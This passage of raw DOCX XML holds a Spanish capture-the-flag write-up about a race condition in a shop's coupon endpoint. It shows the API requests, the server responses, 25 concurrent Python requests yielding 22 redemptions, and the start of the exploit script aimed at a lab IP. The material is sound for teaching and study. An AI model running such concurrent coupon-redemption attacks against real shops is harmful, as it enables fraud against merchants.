        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/signup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Registrar una cuenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/signin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Iniciar sesión</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Consultar el usuario autenticado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Consultar carrito y saldo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/apply-coupon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Canjear un cupón</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Añadir productos al carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/api/checkout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3304" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Procesar la compra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">También se descubrió una referencia al código promocional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ROOTKITTY10</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> dentro del HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La consulta a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/api/state</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> reveló el producto objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</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"flag-ticket": {</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"name": "Entrada Final — Sala Dorada",</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"price": 1000</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before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</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3. Análisis del sistema de cupones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se identificó que el endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/api/apply-coupon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> recibe solicitudes POST con el siguiente formato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</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"code": "ROOTKITTY10"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El primer canje respondió:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</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"ok": true,</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"balance": 50,</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"coupon_used": true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Cada canje válido proporciona US$50 de saldo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sin embargo, al intentar utilizar nuevamente el mismo cupón de forma secuencial, el servidor respondió:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP/1.1 409 Conflict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>{</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"error": "already_used",</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"balance": 50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esto demostraba que el sistema disponía de un control para impedir la reutilización del cupón.</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4. Identificación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se planteó la hipótesis de una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>condición de carrera (Race Condition)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Una condición de carrera ocurre cuando varias operaciones concurrentes acceden o modifican un mismo estado y el resultado depende del orden en el que se ejecutan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En este caso, el comportamiento observado es compatible con que varias solicitudes puedan superar la comprobación de uso del cupón antes de que el servidor registre de forma efectiva su consumo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El flujo vulnerable sería equivalente a:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solicitud A ──┐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solicitud B ──┤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solicitud C ──┼──► Comprobar cupón disponible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solicitud D ──┤              │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solicitud E ──┘              ▼</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Aplicar crédito</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Actualizar estado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El código interno del backend no estaba disponible, por lo que esta explicación representa el mecanismo probable a partir de los resultados, no una verificación directa de su implementación.</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5. Prueba de explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se realizaron 25 solicitudes concurrentes utilizando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> de Python y compartiendo la cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El resultado inicial fue:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saldo: 1100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Canjes: 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Se consiguieron 22 canjes exitosos, equivalentes a US$1,100, aun cuando las solicitudes secuenciales posteriores al primer canje devolvían </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>409</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>La condición de carrera quedó demostrada.</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6. Explotación completa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Para comprar el producto era necesario registrar una cuenta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Durante las pruebas se descubrieron dos requisitos de validación:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El nombre de usuario debía contener entre 3 y 20 caracteres alfanuméricos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La contraseña debía contener al menos 8 caracteres alfanuméricos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Una vez corregidos estos valores, se creó una sesión autenticada y se ejecutó la explotación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Script utilizado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import uuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from concurrent.futures import ThreadPoolExecutor</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BASE = "http://34.135.253.132:35501"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
